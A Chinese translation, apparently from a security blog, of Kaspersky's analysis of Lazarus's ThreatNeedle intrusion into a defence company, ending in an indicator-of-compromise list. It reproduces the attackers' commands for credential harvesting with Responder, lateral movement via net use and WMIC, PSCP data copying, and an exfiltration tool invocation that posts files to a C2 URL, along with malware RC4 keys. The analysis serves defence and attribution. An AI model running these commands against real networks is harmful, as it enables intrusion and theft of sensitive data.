這是作者新開的一個專欄，主要翻譯國外知名安全廠商的APT報告，了解它們的安全技術(shù)，學(xué)習(xí)它們溯源APT組織和惡意代碼分析的方法，希望對您有所幫助。當然，由于作者英語有限，會借助機翻進行校驗，還請包涵！前文分享了伊朗威脅組織APT34（又名“OilRig”）發(fā)起的一項新攻擊行動，使用了一種新的后門變體，稱之為“SideTwist”。這篇文章將詳細講解卡巴斯基分析Lazarus攻擊工業(yè)事件，主要采用ThreatNeedle高級惡意軟件集群。在這次活動中，Lazarus組織展示了其先進的水平和能力來規(guī)避攻擊過程中面臨的安全措施，例如網(wǎng)絡(luò)分段。

• 原文標題：《Lazarus targets defense industry with ThreatNeedle》
• 原文鏈接：https://securelist.com/lazarus-threatneedle/100803/
• 文章作者：卡巴斯基 Vasily Berdnikov
• 發(fā)布時間：2021年2月25日
• 文章來源：securelist.com
• PDF下載：Lazarus-kaspersky

文章目錄

• 一.前言
• 二.最新補充：BMP圖片隱藏RAT惡意樣本
• 三.初次感染
• 四.惡意軟件植入
• • 1.ThreatNeedle安裝程序（installer）
  • 2.ThreatNeedle加載器（loader）
  • 3.ThreatNeedle后門（backdoor）
• 五.Post-exploitation階段
• • 1.憑證收集
  • 2.橫向移動
  • 3.克服網(wǎng)絡(luò)分段
  • 4.Exfiltration 滲出
• 六.溯源
• • 1.與DeathNote集群連接
  • 2.與AppleJeus行動的聯(lián)系
  • 3.與Bookcode集群的連接
• 七.結(jié)論
• • 附錄I 危害指標
  • 附錄II MITER ATT＆CK映射

---

一.前言

我們將拉撒路（Lazarus）評為2020年最活躍的APT組織。我們已經(jīng)觀察到這個臭名昭著的APT組織針對各種行業(yè)的大量活動。該組織的主要目標也發(fā)生了變化。Google TAG最近發(fā)表了一篇文章關(guān)于Lazarus針對安全研究人員的攻擊行動。經(jīng)過仔細研究，我們發(fā)現(xiàn)這些攻擊中使用的惡意軟件屬于我們稱為 ThreatNeedle 的家族。

我們之前已經(jīng)看到Lazarus使用該惡意軟件集群攻擊各個行業(yè)。在2020年中期，我們意識到Lazarus正在使用ThreatNeedle集群對GF工業(yè)發(fā)起攻擊，ThreatNeedle集群是Manuscrypt（又名NukeSped）的高級惡意軟件集群。在調(diào)查該攻擊時，我們能夠觀察到攻擊的整個生命周期，發(fā)現(xiàn)更多技術(shù)細節(jié)以及該組織其他攻擊事件的關(guān)聯(lián)。

該組織在魚叉式網(wǎng)絡(luò)釣魚電子郵件中使用了COVID-19主題，并使用公開來源收集的個人信息來美化郵件。在獲得最初立足點之后，攻擊者收集了憑證并橫向移動，在受害者環(huán)境中尋找關(guān)鍵資產(chǎn)。我們觀察了他們?nèi)绾瓮ㄟ^訪問內(nèi)部路由器并將其配置為代理服務(wù)器來克服網(wǎng)絡(luò)的分割，從而實現(xiàn)從內(nèi)部網(wǎng)絡(luò)竊取數(shù)據(jù)并傳輸?shù)狡溥h程服務(wù)器。到目前為止，已經(jīng)有十幾個國家的組織受到了影響。

在這次調(diào)查中，我們有機會了解命令和控制的基礎(chǔ)結(jié)構(gòu)。攻擊者在不同階段配置了多個C2服務(wù)器，并重用了該組織先前攻擊中的幾個腳本。此外，根據(jù)目前為止的分析，有可能找出與Lazarus相關(guān)的其他攻擊關(guān)聯(lián)事件。

---

二.最新補充：BMP圖片隱藏RAT惡意樣本

在介紹此次攻擊事件之前，我們先來補充Lazarus最新的攻擊技術(shù)，即使用BMP圖像隱藏RAT惡意軟件。

• https://thehackernews.com/2021/04/lazarus-apt-hackers-are-now-using-bmp.html

近日，一名朝鮮黑客對其南方發(fā)動了一場魚叉式網(wǎng)絡(luò)釣魚攻擊，該黑客將惡意代碼隱藏在位圖(. bmp)圖像文件中，從而投放了一個能夠竊取敏感信息的遠程木馬(RAT)。

來自Malwarebytes的研究人員將此次攻擊歸因于Lazarus組織，原因是該組織與對手之前采用的策略相似。他們表示，網(wǎng)絡(luò)釣魚活動始于散布帶有惡意文件的電子郵件，該公司在4月13日發(fā)現(xiàn)了該文件。

Malwarebytes研究人員說： “攻擊者使用了一種聰明的方法來繞過安全機制，在該機制中，它將其惡意HTA文件作為壓縮的zlib文件嵌入到PNG文件中，然后在運行時通過將其自身轉(zhuǎn)換為BMP格式進行了解壓縮。” 。

個人疑問

• 怎么在目標主機實現(xiàn)自動解壓文件？利用CVE自解壓漏洞嗎？
• 怎么執(zhí)行RAT惡意樣本？
• PNG格式和BMP格式在這里存在什么轉(zhuǎn)換關(guān)系？

投放的有效載荷（payload）是一個裝載機，它將第二階段的有效載荷解碼并解密到內(nèi)存中。第二階段的有效載荷具有接收和執(zhí)行命令或shellcode的能力，它還可以執(zhí)行撤離以及與控制服務(wù)器的通信能力。

引誘文件（韓文）創(chuàng)建于2021年3月31日，據(jù)稱是韓國某個城市交易會的參與申請表，并在首次打開時提示啟用宏，只有執(zhí)行攻擊代碼才能觸發(fā)感染鏈，最終刪除了一個名為“ AppStore.exe”的可執(zhí)行文件。

此外，該有效載荷將繼續(xù)提取附加到自身第二階段的加密有效負載，并在運行時對其進行解碼和解密，然后與遠程服務(wù)器建立通信以接收命令，并將這些命令的結(jié)果傳輸回服務(wù)器。

總之，Lazarus作為朝鮮最活躍、最復(fù)雜的威脅組織之一，在過去的幾年中，它已瞄準了包括韓國、日本在內(nèi)的多個國家。眾所周知，Lazarus在操作中采用了新的技術(shù)和自定義工具集，從而提高攻擊的效率。

---

三.初次感染

言歸正傳，回到工業(yè)攻擊事件。

在這次攻擊中，魚叉式網(wǎng)絡(luò)釣魚被作為最初的感染媒介。在發(fā)動攻擊之前，該組織研究了有關(guān)目標組織的公開信息，并確定了屬于該公司各個部門的電子郵件地址。

這些部門中的電子郵件地址收到網(wǎng)絡(luò)釣魚電子郵件要么帶有惡意的Word文檔，要么帶有遠程服務(wù)器上托管的惡意Word文檔的鏈接。網(wǎng)絡(luò)釣魚電子郵件聲稱對當今最熱門的主題——COVID-19具有緊急的更新。這些釣魚郵件是代表受攻擊組織的一個醫(yī)療中心精心制作和編寫的。

圖1 網(wǎng)絡(luò)釣魚電子郵件以及指向惡意文檔的鏈接

攻擊者在一個公共電子郵件服務(wù)上注冊了賬戶，確保發(fā)件人的電子郵件地址與醫(yī)療中心的真實電子郵件地址相似。釣魚郵件中顯示的簽名包括被攻擊組織醫(yī)療中心副主任醫(yī)生的實際個人數(shù)據(jù)。攻擊者能夠在該醫(yī)療中心的公共網(wǎng)站上找到這些信息。

微軟Word文檔中的一個宏包含惡意代碼，旨在下載并在受感染的系統(tǒng)上執(zhí)行額外的惡意軟件。該文件包含人口健康評估計劃的信息，與網(wǎng)絡(luò)釣魚郵件(COVID-19)的主題沒有直接關(guān)系，這表明攻擊者可能沒有完全理解他們所使用內(nèi)容的含義。

圖2 惡意文件的內(nèi)容

誘餌文件的內(nèi)容是從一個健康診所的在線帖子中復(fù)制的。我們的調(diào)查顯示，最初的魚叉式網(wǎng)絡(luò)釣魚嘗試是不成功的，因為在目標系統(tǒng)的Microsoft Office安裝中禁用了宏。為了說服目標允許惡意宏，攻擊者發(fā)送了另一封電子郵件，展示如何在Microsoft Office中啟用宏。

圖3 發(fā)送電子郵件，說明如何啟用宏#1

在發(fā)送了上述解釋的電子郵件后，攻擊者意識到目標使用的是不同版本的Microsoft Office，因此需要不同的過程來啟用宏。隨后，攻擊者又發(fā)了一封電子郵件，在一張截圖中顯示了正確的操作步驟，并附上了一個俄語包。

圖4 發(fā)送電子郵件，說明如何啟用宏#2

2020年5月21日至26日，攻擊者發(fā)送的魚叉式網(wǎng)絡(luò)釣魚郵件內(nèi)容中沒有任何語法錯誤。然而，在隨后的郵件中，攻擊者犯了許多錯誤，這表明他們的母語可能不是俄語，并使用了翻譯工具。

圖5 電子郵件包含一些語法錯誤

2020年6月3日，員工打開了一個惡意附件，在當?shù)貢r間上午9:30，攻擊者獲得了受感染系統(tǒng)的遠程控制。

該組織還使用了不同類型的魚叉式網(wǎng)絡(luò)釣魚攻擊。其中一個被攻擊的主機在2020年5月19日收到了幾份魚叉式網(wǎng)絡(luò)釣魚文件。發(fā)送的名為 Boeing_AERO_GS.docx 的惡意文件從遠程服務(wù)器獲取模板。

但是，無法發(fā)現(xiàn)此惡意文檔創(chuàng)建的有效負載。我們推測，這個惡意文件的感染失敗了，原因我們不知道。幾天后，同一臺主機打開了另一個惡意文檔。威脅者在最初感染后從磁盤中刪除了這些文件，這意味著它們無法獲得。

盡管如此，根據(jù)我們的遙測技術(shù)我們找到了一份帶有這種惡意軟件的相關(guān)惡意文件。它創(chuàng)建一個有效負載和快捷文件，然后使用以下命令行參數(shù)繼續(xù)執(zhí)行有效負載。

• 有效載荷路徑：%APPDATA%\Microsoft\Windows\lconcaches.db
• 快捷方式路徑：%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\OneDrives.lnk
• 命令行：請注意，末尾的字符串是硬編碼，但每個示例都不一樣
• exe [dllpath],Dispatch n2UmQ9McxUds2b29

誘餌文件的內(nèi)容描述了發(fā)電機/電力工業(yè)工程師的職位描述。

圖6 誘餌文件

---

四.惡意軟件植入

在打開惡意文檔并允許該宏時，惡意軟件將被刪除，并進入一個多階段部署過程。這次行動中使用的惡意軟件屬于一個已知的惡意軟件集群，我們稱之為“ThreatNeedle”。我們將這個惡意軟件家族歸咎于高級版本的Manuscrypt（又名NukeSped），一個屬于Lazarus集團的家族。

我們之前觀察到Lazarus組織利用這個集群攻擊加密貨幣業(yè)務(wù)和一家移動游戲公司。雖然惡意軟件涉及和整個感染過程是已知的，并且與以前的發(fā)現(xiàn)相比并沒有發(fā)生太大變化，但Lazarus組織繼續(xù)使用的ThreatNeedle意軟件侵略性的活動。

圖7 感染過程

初始魚叉式釣魚文檔創(chuàng)建的有效負載將加載下一階段，作為在內(nèi)存中運行的后門——ThreatNeedle后門。ThreatNeedle提供了控制受感染受害者的功能。參與者使用它進行最初的偵察，并為橫向移動部署額外的惡意軟件。

當橫向移動時，參與者在過程中使用ThreatNeedle安裝程序類型的惡意軟件。這個安裝程序負責(zé)植入下一階段加載程序類型的惡意軟件，并對其進行注冊以進行自動執(zhí)行，從而實現(xiàn)持久性。ThreatNeedle加載器類型的惡意軟件存在多種變體，其主要目的是在內(nèi)存中加載ThreatNeedle惡意軟件的最后階段。

1.ThreatNeedle安裝程序（installer）

一旦啟動，惡意軟件使用RC4解密嵌入字符串（密鑰:B6 B7 2D 8C 6B 5F 14 DF B1 38 A1 73 89 C1 D2 C4），并將其與“7486513879852”進行比較。如果用戶在沒有命令行參數(shù)的情況下執(zhí)行這個惡意軟件，惡意軟件就會啟動一個合法的計算器，上面帶有受歡迎的復(fù)仇者聯(lián)盟的黑暗圖標。

在感染過程中，惡意軟件隨機從netsvc中選擇一個服務(wù)名稱，以便將其用于有效載荷創(chuàng)建路徑。然后，惡意軟件在系統(tǒng)文件夾中創(chuàng)建一個名為 bcdbootinfo.tlp 的文件，其中包含感染時間和所選的隨機服務(wù)名稱。我們發(fā)現(xiàn)，惡意軟件操作人員會檢查這個文件，以查看遠程主機是否被感染，以及感染發(fā)送的時間。

然后，它使用RC4算法解密嵌入的有效載荷，將其保存為.xml擴展名，并在當前目錄中隨機創(chuàng)建5個字符的文件名，再將其復(fù)制到system文件夾中，并使用.sys擴展名。

最后一個有效載荷是在內(nèi)存中運行的ThreatNeedle加載程序。此時，加載器使用不同的RC4密鑰（3D 68 D0 0A B1 0E C6 AF DD EE 18 8E F4 A1 D6 20），被刪除的惡意軟件注冊為Windows服務(wù)并啟動。此外，該惡意軟件還會將配置數(shù)據(jù)另存為在RC4中加密的注冊表項：

• HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameConfig – Description

---

2.ThreatNeedle加載器（loader）

該組件負責(zé)將最終的后門有效負載加載到內(nèi)存中。為了做到這一點，惡意軟件使用幾種技術(shù)來解密其有效載荷：

• 從注冊表加載有效載荷（payload）
• 在解密RC4和解壓縮后，從自身加載有效載荷（payload）
• 解密AES并解壓縮后，從自身加載有效載荷（payload）
• 解壓后從自身加載有效載荷（payload）
• 在一字節(jié)的異或后，從自身加載有效載荷（payload）

大多數(shù)加載程序類型的惡意軟件都會檢查命令行參數(shù)，并且只有在給出預(yù)期參數(shù)時才繼續(xù)執(zhí)行惡意程序。這是ThreatNeedle加載程序中的一個常見特性。我們見過的最常見的示例類似于ThreatNeedle安裝程序，即惡意軟件使用RC4解密嵌入的字符串，并在啟動時將其與參數(shù)“Sx6BrUk4v4rqBFBV”進行比較。如果匹配，惡意軟件就開始使用相同的RC4密鑰解密嵌入的有效載荷。解密后的有效載荷是一個歸檔文件，隨后在處理過程中解壓縮。最終，惡意軟件ThreatNeedle會在內(nèi)存中生成。

加載器的另一個變種正在準備受害者注冊表中下一階段的有效載荷。正如我們從安裝程序惡意軟件描述中看到的，我們懷疑注冊表項是安裝程序組件創(chuàng)建的。從注冊表檢索到的數(shù)據(jù)使用RC4解密，然后解壓縮。最后，它被加載到內(nèi)存中，并被調(diào)用導(dǎo)出函數(shù)。

---

3.ThreatNeedle后門（backdoor）

在內(nèi)存中執(zhí)行的最終有效載荷是實際的ThreatNeedle后門。它具有以下功能來控制受感染的受害者計算機：

• 操作文件/目錄
• 系統(tǒng)分析
• 控制后門
• 進入睡眠或休眠模式
• 更新后門配置
• 執(zhí)行收到的命令

---

五.Post-exploitation階段

在其中一臺主機上，我們發(fā)現(xiàn)參與者執(zhí)行了一個名為Responder的證書收集工具，并使用Windows命令橫向移動。Lazarus克服了網(wǎng)絡(luò)分段問題，通過破壞路由器虛擬機，從與互聯(lián)網(wǎng)斷開的完全隔離的網(wǎng)絡(luò)分段中竊取數(shù)據(jù)，如下文“克服網(wǎng)絡(luò)分段”中所述。

從攻擊后感染了ThreatNeedle后門的主機來判斷，我們推測此次攻擊的主要目的是竊取知識產(chǎn)權(quán)。最后，使用自定義工具對竊取的數(shù)據(jù)進行竊聽，這將在“滲透”部分中進行描述。以下是我們調(diào)查的大致時間表。

圖8 感染主機的時間表

1.憑證收集

在調(diào)查過程中，我們發(fā)現(xiàn)響應(yīng)程序工具是從收到魚叉式網(wǎng)絡(luò)釣魚文件的一臺受害者計算機執(zhí)行的。初始感染的一天后，惡意軟件操作員將該工具放置到該主機上，并使用以下命令執(zhí)行該工具：

• [Responder file path] -i [IP address] -rPv

幾天后，攻擊者開始從該主機橫向移動。因此，我們評估攻擊者已成功從該主機獲取登錄憑據(jù)，并開始將其用于進一步的惡意活動。

---

2.橫向移動

在獲得登錄憑據(jù)之后，參與者開始從工作站橫向移動到服務(wù)器主機。采用典型的橫向移動方法，使用Windows命令。首先，使用“net use”命令建立與遠程主機的網(wǎng)絡(luò)連接。

• net use \[IP address]\IPC$ “[password]” /u:"[user name]" > $temp~tmp5936t.tmp 2>&1″

接下來，攻擊者使用Windows管理規(guī)范命令行（WMIC）將惡意軟件復(fù)制到遠程主機。

• exe /node:[IP address] /user:"[user name]" /password:"[password]" PROCESS CALL CREATE "cmd.exe /c $appdata\Adobe\adobe.bat"
• exe /node:[IP address] /user:"[user name]" /password:"[password]" PROCESS CALL CREATE "cmd /c sc queryex helpsvc > $temp\tmp001.dat"

---

3.克服網(wǎng)絡(luò)分段

在這項研究過程中，我們確定了另一種高度有趣的技術(shù)，由攻擊者用于橫向移動和泄漏竊取的數(shù)據(jù)。受到攻擊的企業(yè)網(wǎng)絡(luò)分為兩個部分:corporate(計算機可以訪問internet的網(wǎng)絡(luò))和restricted(計算機承載敏感數(shù)據(jù)但不能訪問internet的網(wǎng)絡(luò))。根據(jù)公司政策，這兩個部門之間不允許傳遞信息。換句話說，這兩個部分應(yīng)該完全分開。

在這項研究過程中，我們發(fā)現(xiàn)了攻擊者用于橫向移動和竊取被竊取數(shù)據(jù)的另一種非常有趣的技術(shù)。受攻擊的企業(yè)網(wǎng)絡(luò)分為兩個部分：

• 公司網(wǎng)絡(luò) corporate（一個計算機可以訪問Internet的網(wǎng)絡(luò)）
• 受限網(wǎng)絡(luò) restricted（計算機在其中托管敏感數(shù)據(jù)并且不能訪問Internet的網(wǎng)絡(luò)）

根據(jù)公司政策，這兩個部分之間不允許信息傳遞。換句話說，這兩個部分是要完全分開的。

最初，攻擊者能夠訪問具有Internet訪問權(quán)限的系統(tǒng)，并花費了很長時間在網(wǎng)絡(luò)企業(yè)部門的計算機之間分發(fā)惡意軟件。在受感染計算機中，有企業(yè)IT基礎(chǔ)架構(gòu)管理員使用的計算機。

值得注意的是，管理員可以同時連接到公司網(wǎng)段和受限制的網(wǎng)段，以維護系統(tǒng)并在兩個區(qū)域中為用戶提供技術(shù)支持。因此，通過獲得管理員工作站的控制權(quán)，攻擊者就能訪問受限制的網(wǎng)段。

但是，由于無法在網(wǎng)段之間直接路由流量，因此攻擊者無法使用其標準惡意軟件集將數(shù)據(jù)從受限網(wǎng)段泄漏到C2中。

這種情況在7月2日發(fā)生了變化，攻擊者設(shè)法獲得了管理員用來連接到兩個網(wǎng)段中系統(tǒng)的路由器的憑據(jù)。路由器是一臺運行CentOS的虛擬機，可根據(jù)預(yù)定義的規(guī)則在多個網(wǎng)絡(luò)接口之間路由流量。

圖9 受害人網(wǎng)段之間的連接布局

根據(jù)收集的證據(jù)，攻擊者掃描了路由器的端口并檢測到Webmin界面。接下來，攻擊者使用root特權(quán)帳戶登錄Web界面。目前還不清楚攻擊者如何獲得該帳戶的憑據(jù)，但是憑據(jù)可能保存在受感染系統(tǒng)的瀏覽器密碼管理器之一中。

圖10 列出Webmin web界面登錄的日志

通過訪問配置面板，攻擊者配置了Apache Web服務(wù)器，并開始將路由器用作組織的公司部門和受限部門之間的代理服務(wù)器。

圖11 路由器上使用的服務(wù)列表

此后幾天，也就是2020年7月10日，攻擊者通過SSH連接到路由器，并在其中一臺被感染的計算機上安裝了PuTTy PSCP（PuTTY安全復(fù)制客戶端）實用程序。該程序用于將惡意軟件上傳到路由器虛擬機。這使攻擊者可以使用路由器托管樣本，將惡意軟件放置在企業(yè)網(wǎng)絡(luò)受限網(wǎng)段的系統(tǒng)上。此外，在網(wǎng)絡(luò)受限網(wǎng)段中運行的惡意軟件還可以通過在同一路由器上設(shè)置的Apache服務(wù)器將收集到的數(shù)據(jù)泄露到命令和控制服務(wù)器。

圖12 攻擊者入侵后的新連接布局

在調(diào)查過程中，我們使用路由器的硬編碼URL（用作代理服務(wù)器）識別了惡意軟件樣本。

圖13 惡意軟件中的硬編碼代理地址

由于攻擊者會定期從路由器刪除日志文件，因此只能恢復(fù)通過SSH輸入到命令行的少數(shù)命令。對這些命令的分析表明，攻擊者試圖使用route命令重新配置流量路由。

圖14 攻擊者命令

攻擊者還在路由器虛擬機VM上運行nmap程序，并在企業(yè)網(wǎng)絡(luò)受限網(wǎng)段內(nèi)的系統(tǒng)上掃描端口。9月27日，攻擊者開始使用logrotate程序來設(shè)置自動刪除日志文件的功能，并從路由器中刪除其活動的所有痕跡。

圖15 Webmin日志

---

4.Exfiltration 滲出

我們觀察到，惡意軟件操作員試圖從數(shù)個受損的服務(wù)器主機創(chuàng)建到位于韓國的遠程服務(wù)器的SSH隧道。他們使用了自定義的隧道工具來實現(xiàn)這一目標。該工具接收四個參數(shù)：

• 客戶端IP地址（client IP address）
• 客戶端端口（client port）
• 服務(wù)器IP地址（server IP address）
• 服務(wù)器端口（ server port）

該工具提供基本功能，可將客戶端流量轉(zhuǎn)發(fā)到服務(wù)器。為了創(chuàng)建隱蔽通道，惡意軟件使用簡單的二進制加密對轉(zhuǎn)發(fā)的流量進行加密。

圖16 加密程序

利用隱蔽渠道，攻擊者使用PuTTy PSCP工具將數(shù)據(jù)從遠程服務(wù)器復(fù)制到主機：

• %APPDATA%\PBL\unpack.tmp -pw [password] root@[IP address]: /tmp/cab0215 %APPDATA%\PBL\cab0215.tmp

從服務(wù)器復(fù)制數(shù)據(jù)后，攻擊者使用定制工具將竊取的數(shù)據(jù)泄漏到遠程服務(wù)器。該惡意軟件看起來像是合法的VNC客戶端，如果在沒有任何命令行參數(shù)的情況下執(zhí)行，則會像一個VNC客戶端一樣運行。

圖17 執(zhí)行不帶參數(shù)的惡意軟件

但是，如果使用特定的命令行參數(shù)執(zhí)行此應(yīng)用程序，則會運行其他惡意功能。根據(jù)我們觀察的數(shù)據(jù)，攻擊者使用六個參數(shù)執(zhí)行了此應(yīng)用程序：

%APPDATA%\Comms\Comms.dat S0RMM-50QQE-F65DN-DCPYN-5QEQA hxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp %APPDATA%\Comms\cab59.tmp FL0509 15000

此外，如果命令行參數(shù)的數(shù)量大于6個，則惡意軟件會跳入惡意程序中。惡意軟件還會檢查第二個參數(shù)的長度，如果它少于29個字符，它將終止執(zhí)行。參數(shù)檢查過程成功通過后，惡意軟件將開始解密其下一個有效載荷。

嵌入式有效載荷通過XOR解密，其中有效載荷末尾的每個字節(jié)都應(yīng)用于前一個字節(jié)。接下來，XORed Blob接收提供的第二個命令行參數(shù)（在本例中為S0RMM-50QQE-F65DN-DCPYN-5QEQA）。該惡意軟件可以接受更多命令行參數(shù)，并且根據(jù)其數(shù)量，其運行方式也有所不同。例如，還可以使用 “-p” 選項接收代理服務(wù)器地址。

當執(zhí)行解密的內(nèi)存有效載荷時，它會將傳遞的配置數(shù)據(jù)的標頭與字符串“ 0x8406”進行比較，以確認其有效性。有效負載將打開給定文件（在本示例中為％APPDATA％ \ Comms \ cab59.tmp），并開始將其分發(fā)到遠程服務(wù)器。當惡意軟件將數(shù)據(jù)上傳到C2服務(wù)器時，它使用HTTP POST請求，并帶有兩個名為’fr’和’fp’的參數(shù)：

• fr參數(shù)包含要上傳的命令行參數(shù)中的文件名
• fp參數(shù)包含base64編碼的大小，內(nèi)容的CRC32值和文件內(nèi)容

圖18 fp參數(shù)的內(nèi)容

---

六.溯源

我們已經(jīng)跟蹤ThreatNeedle惡意軟件已有兩年多了，并且高度確信此惡意軟件群集僅歸因于Lazarus組織。在此調(diào)查過程中，我們能夠找到與Lazarus組織相關(guān)的幾個集群的聯(lián)系。

圖19 拉撒路運動之間的聯(lián)系

1.與DeathNote集群連接

在此調(diào)查過程中，我們確定了與Lazarus組織的DeathNote（又名Operation Dream Job）集群的幾種聯(lián)系。

• 首先，在被ThreatNeedle惡意軟件感染的主機中，我們發(fā)現(xiàn)了一臺也感染了DeathNote惡意軟件的主機，并且兩種威脅都使用相同的C2服務(wù)器URL。
• 此外，在分析此攻擊中使用的C2服務(wù)器時，我們發(fā)現(xiàn)了一個自定義的Web Shell腳本，該腳本也在DeathNote C2服務(wù)器上發(fā)現(xiàn)。我們還確定在DeathNote C2服務(wù)器上找到了與特洛伊木馬VNC上傳器相對應(yīng)的服務(wù)器腳本。

盡管DeathNote和此事件顯示了不同的TTP，但這兩個攻擊共享命令和控制基礎(chǔ)結(jié)構(gòu)以及某些受害者。

---

2.與AppleJeus行動的聯(lián)系

我們還發(fā)現(xiàn)了與Operation AppleJeus的聯(lián)系。

• 正如我們所描述的，攻擊者在ThreatNeedle活動中使用了自制的隧道工具，該工具具有自定義的加密例程來創(chuàng)建隱蔽通道。AppleJeus操作中也使用了該工具。

圖20 相同的隧道工具

---

3.與Bookcode集群的連接

在之前有關(guān)Lazarus組的博客中，我們提到了歸因于Lazarus組的Bookcode集群。最近，韓國互聯(lián)網(wǎng)aq局（KISA）也發(fā)布了有關(guān)此操作的報告。

• 在報告中，他們提到了一個名為LPEClient的惡意軟件群集，用于對主機進行性能分析并獲取下一階段的有效負載。在調(diào)查此事件時，我們還從感染了ThreatNeedle的主機中發(fā)現(xiàn)了LPEClient。因此，我們估計ThreatNeedle群集已連接到Bookcode操作。

---

七.結(jié)論

近年來，拉撒路（Lazarus）組織專注于攻擊世界各地的金融機構(gòu)。但是，從2020年初開始，他們專注于積極進攻GF工業(yè)。盡管Lazarus以前還曾在針對加密貨幣企業(yè)時利用了此攻擊中使用的ThreatNeedle惡意軟件，但目前正在積極地用于網(wǎng)絡(luò)攻擊。

這項調(diào)查使我們能夠在Lazarus進行的多個運動之間建立牢固的聯(lián)系，從而加強了我們的歸屬感。在這次活動中，Lazarus小組展示了其先進的水平和能力來規(guī)避他們在攻擊過程中面臨的安全措施，例如網(wǎng)絡(luò)分段。我們估計拉撒路是一個多產(chǎn)的群體，使用不同的策略開展了幾次運動。他們在這些運動中共享工具和基礎(chǔ)設(shè)施以實現(xiàn)其目標。

最后，感謝卡巴斯基ICS CERT，以及本文的作者Vasily Berdnikov（卡巴斯基目標攻擊研究小組）的幫助。他們的分析報告是真的精彩，值得我們學(xué)習(xí)。

---

前文分享：

• [譯] APT分析報告：01.Linux系統(tǒng)下針對性的APT攻擊概述
• [譯] APT分析報告：02.釣魚郵件網(wǎng)址混淆URL逃避檢測
• [譯] APT分析報告：03.OpBlueRaven揭露APT組織Fin7/Carbanak（上）Tirion惡意軟件
• [譯] APT分析報告：04.Kraken - 新型無文件APT攻擊利用Windows錯誤報告服務(wù)逃避檢測
• [譯] APT分析報告：05.Turla新型水坑攻擊后門（NetFlash和PyFlash）
• [譯] APT分析報告：06.猖獗的小貓——針對伊朗的APT攻擊活動詳解
• [譯] APT分析報告：07.拉撒路（Lazarus）使用的兩款惡意軟件分析
• [譯] APT分析報告：08.漏洞利用圖譜–通過查找作者的指紋來尋找漏洞
• [譯] APT分析報告：09.伊朗APT34更新武器庫——SideTwist變體
• [譯] APT分析報告：10.Lazarus以ThreatNeedle家族攻擊工業(yè)事件還原（BMP圖片隱藏RAT）

2020年8月18新開的“娜璋AI安全之家”，主要圍繞Python大數(shù)據(jù)分析、網(wǎng)絡(luò)空間安全、逆向分析、APT分析報告、人工智能、Web滲透及攻防技術(shù)進行講解，同時分享CCF、SCI、南核北核論文的算法實現(xiàn)。娜璋之家會更加系統(tǒng)，并重構(gòu)作者的所有文章，從零講解Python和安全，寫了近十年文章，真心想把自己所學(xué)所感所做分享出來，還請各位多多指教，真誠邀請您的關(guān)注！謝謝。

(By:Eastmount 2021-04-21 星期三 晚上10點寫于武漢 http://blog.csdn.net/eastmount/ )

---

附錄I 危害指標

惡意文件

e7aa0237fc3db67a96ebd877806a2c88 Boeing_AERO_GS.docx

安裝程序

b191cc4d73a247afe0a62a8c38dc9137 %APPDATA%\Microsoft\DRM\logon.bin 9e440e231ef2c62c78147169a26a1bd3 C:\ProgramData\ntnser.bin b7cc295767c1d8c6c68b1bb6c4b4214f C:\ProgramData\ntnser.bin 0f967343e50500494cf3481ce4de698c C:\ProgramData\Microsoft\MSDN\msdn.bin 09aa1427f26e7dd48955f09a9c604564 %APPDATA\Microsoft\info.dat 07b22533d08f32d48485a521dbc1974d C:\ProgramData\adobe\load.dat 1c5e4d60a1041cf2903817a31c1fa212 C:\ProgramData\Adobe\adobe.tmp 4cebc83229a40c25434c51ee3d6be13e C:\ProgramData\Adobe\up.tmp 23b04b18c75aa7d286fea5d28d41a830 %APPDATA%\Microsoft\DRM\logon.dat 319ace20f6ffd39b7fff1444f73c9f5d %APPDATA%\Microsoft\DRM\logon.bin 45c0a6e13cad26c69eff59fded88ef36 %APPDATA%\Microsoft\DRM\logon.dat 486f25db5ca980ef4a7f6dfbf9e2a1ad C:\ProgramData\ntusers.dat 1333967486d3ab50d768fb745dae9af5 C:\PerfLogs\log.bin 07b22533d08f32d48485a521dbc1974d C:\ProgramData\Adobe\load.dat c86d0a2fa9c4ef59aa09e2435b4ab70c %TEMP%\ETS4659.tmp 69d71f06fbfe177fb1a5f57b9c3ae587 %APPDATA%\Microsoft\Windows\shsvcs.db 7bad67dcaf269f9ee18869e5ef6b2dc1 956e5138940a4f44d1c2c24f122966bd %APPDATA%\ntuser.bin

加載器

ed627b7bbf7ea78c343e9fb99783c62b 1a17609b7df20dcb3bd1b71b7cb3c674 %ALLUSERSPROFILE%\ntuser.bin fa9635b479a79a3e3fba3d9e65b842c3 3758bda17b20010ff864575b0ccd9e50 %SYSTEMROOT%\system\mraudio.drv cbcf15e272c422b029fcf1b82709e333 %SYSTEMROOT%\system\mraudio.drv 9cb513684f1024bea912e539e482473a 36ab0902797bd18acd6880040369731c %SYSTEMROOT%\LogonHours.sys db35391857bcf7b0fa17dbbed97ad269 %ALLUSERSPROFILE%\Adobe\update.tmp be4c927f636d2ae88a1e0786551bf3c4 %ALLUSERSPROFILE%\Adobe\unpack.tmp 728948c66582858f6a3d3136c7fbe84a %APPDATA%\Microsoft\IBM.DAT 06af39b9954dfe9ac5e4ec397a3003fb 29c5eb3f17273383782c716754a3025a 79d58b6e850647024fea1c53e997a3f6 e604185ee40264da4b7d10fdb6c7ab5e 2a73d232334e9956d5b712cc74e01753 1a17609b7df20dcb3bd1b71b7cb3c674 %ALLUSERSPROFILE%\ntuser.bin 459be1d21a026d5ac3580888c8239b07 %ALLUSERSPROFILE%\ntuser.bin 87fb7be83eff9bea0d6cc95d68865564 %SYSTEMROOT%\SysWOW64\wmdmpmsp.sys 062a40e74f8033138d19aa94f0d0ed6e %APPDATA%\microsoft\OutIook.db 9b17f0db7aeff5d479eaee8056b9ac09 %TEMP%\ETS4658.tmp, %APPDATA%\Temp\BTM0345.tmp 9b17f0db7aeff5d479eaee8056b9ac09 %APPDATA%\Temp\BTM0345.tmp 420d91db69b83ac9ca3be23f6b3a620b 238e31b562418c236ed1a0445016117c %APPDATA%\Microsoft\Windows\lconcaches.db, %TEMP%\cache.db 36ab0902797bd18acd6880040369731c 238e31b562418c236ed1a0445016117c %TEMP%\cache.db, %APPDATA%\Microsoft\Windows\lconcaches.db ad1a93d6e6b8a4f6956186c213494d17 %APPDATA%\Microsoft\Windows\shsvcs.db c34d5d2cc857b6ee9038d8bb107800f1

注冊表加載器

